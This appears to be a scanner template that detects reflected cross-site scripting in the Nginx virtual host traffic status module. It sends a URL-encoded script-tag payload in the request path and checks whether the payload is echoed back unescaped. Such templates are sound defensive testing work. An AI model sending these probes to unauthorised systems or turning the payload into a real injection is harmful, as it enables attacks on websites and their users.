id: nginx-module-vts-xss

info:
  name: Nginx virtual host traffic status module XSS
  author: madrobot
  severity: medium
  tags: nginx,xss

requests:
  - method: GET
    path:
      - "{{BaseURL}}/status%3E%3Cscript%3Ealert(31337)%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "<script>alert(31337)</script>"
        part: body

      - type: word
        words:
          - "text/html"
        part: header